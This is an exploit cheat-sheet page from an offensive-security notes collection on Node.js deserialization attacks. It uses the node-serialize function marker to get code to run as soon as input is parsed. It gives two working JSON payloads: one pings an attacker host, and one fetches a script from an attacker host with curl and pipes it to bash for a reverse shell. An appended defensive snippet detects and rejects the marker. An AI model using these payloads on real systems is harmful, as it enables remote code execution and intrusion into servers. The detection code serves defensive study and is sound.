killchain-compendium/exploit/web/nodejs/deserialization.md

2021-12-04 00:26:03 +01:00
# De/Serialization
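* A string value that starts with `_$$ND_FUNC$$_function (){}` is turned back into a function during deserialization; with a trailing `()`, as in the payloads below, it is invoked immediately and is executed as soon as the input is parsed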
## Example Payloads
* Encode the payload, send it, and wait for the ICMP callback with `sudo tcpdump -i <interface> icmp`
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('ping -c 10 <attacker-IP>', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
* Reverse shell by fetching a script from the attacker host and piping it to `bash`:
```js
{"pwn": "_$$ND_FUNC$$_function () {\n \t require('child_process').exec('curl <attacker-IP>:8000 | bash', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
```
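
For the defending side, an added example (not part of the original page): a guard that parses untrusted input with `JSON.parse` only and rejects any string carrying the `_$$ND_FUNC$$_` marker before it can reach a function-reviving deserializer. The names `findSerializedFunctions` and `safeParse`, the sample object, and the base64 transport are assumptions made for illustration.

```javascript
// Added defensive example; function names and sample data are constructed.
const FUNC_MARKER = '_$$ND_FUNC$$_';            // marker from the payloads above
const IIFE_TAIL = /\}\s*\(\s*\)\s*;?\s*$/;      // function body followed by "()"

// Constructed sample with a harmless function body, nested to show path reporting.
const SAMPLE = JSON.stringify({
  user: 'alice',
  profile: ['x', { pwn: '_$$ND_FUNC$$_function () { return 1 }()' }],
});

// Walk a parsed JSON value and report every string that carries the marker.
function findSerializedFunctions(value, path = '$', hits = []) {
  if (typeof value === 'string') {
    // includes() is deliberately broader than a prefix check.
    if (value.includes(FUNC_MARKER)) {
      hits.push({ path, selfInvoking: IIFE_TAIL.test(value) });
    }
  } else if (Array.isArray(value)) {
    value.forEach((v, i) => findSerializedFunctions(v, `${path}[${i}]`, hits));
  } else if (value !== null && typeof value === 'object') {
    for (const [key, v] of Object.entries(value)) {
      findSerializedFunctions(v, `${path}.${key}`, hits);
    }
  }
  return hits;
}

// Parse untrusted input as data only. Accepts raw JSON or, as an assumption
// about how the value is transported, base64-wrapped JSON.
function safeParse(input) {
  let text = String(input).trim();
  if (!text.startsWith('{') && !text.startsWith('[')) {
    text = Buffer.from(text, 'base64').toString('utf8');
  }
  const data = JSON.parse(text);   // JSON.parse never evaluates code
  const hits = findSerializedFunctions(data);
  if (hits.length > 0) {
    const err = new Error('serialized function marker in untrusted input');
    err.hits = hits;               // log these paths, then reject the request
    throw err;
  }
  return data;
}
```

The `selfInvoking` flag separates a serialized function that is merely present from one that would run during deserialization, which is useful when triaging logged hits.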